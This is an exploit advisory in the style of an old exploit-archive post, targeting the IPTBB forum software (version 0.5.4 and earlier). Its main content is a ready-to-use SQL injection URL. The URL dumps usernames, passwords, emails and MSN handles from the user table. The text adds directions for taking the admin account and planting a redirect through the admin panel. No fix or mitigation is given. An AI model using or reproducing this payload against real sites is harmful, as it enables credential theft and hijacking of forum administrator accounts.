--------------------------------------------------------------- ____ __________ __ ____ __ /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ | | | \ | |/ \ \___| | /_____/ | || | |___|___| /\__| /______ /\___ >__| |___||__| \/\______| \/ \/ --------------------------------------------------------------- Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org --------------------------------------------------------------- Remote Sql Injection --------------------------------------------------------------- # Author: MhZ91 # Title: IPTBB <= 0.5.4 Remote Sql Injection # Download: http://sourceforge.net/projects/iptbb/ # Bug: Remote Sql Injection # Info: IPTBB is a free forum system built using PHP and mysql. # Visit: http://www.inj3ct-it.org --------------------------------------------------------------- http://[site]/index.php?act=viewdir&id='+union+select+1,concat(username,char(58),password,char(58),email,char(58),msn)+from+iptbb_users+where+id=[UserID]/* Change [UserID] whit id of member u want get user and password ( the default id of the admin is 1 ) . In the admincp.php , in general settings, u can insert a html code for redirect . --------------------------------------------------------------- # milw0rm.com [2007-12-31]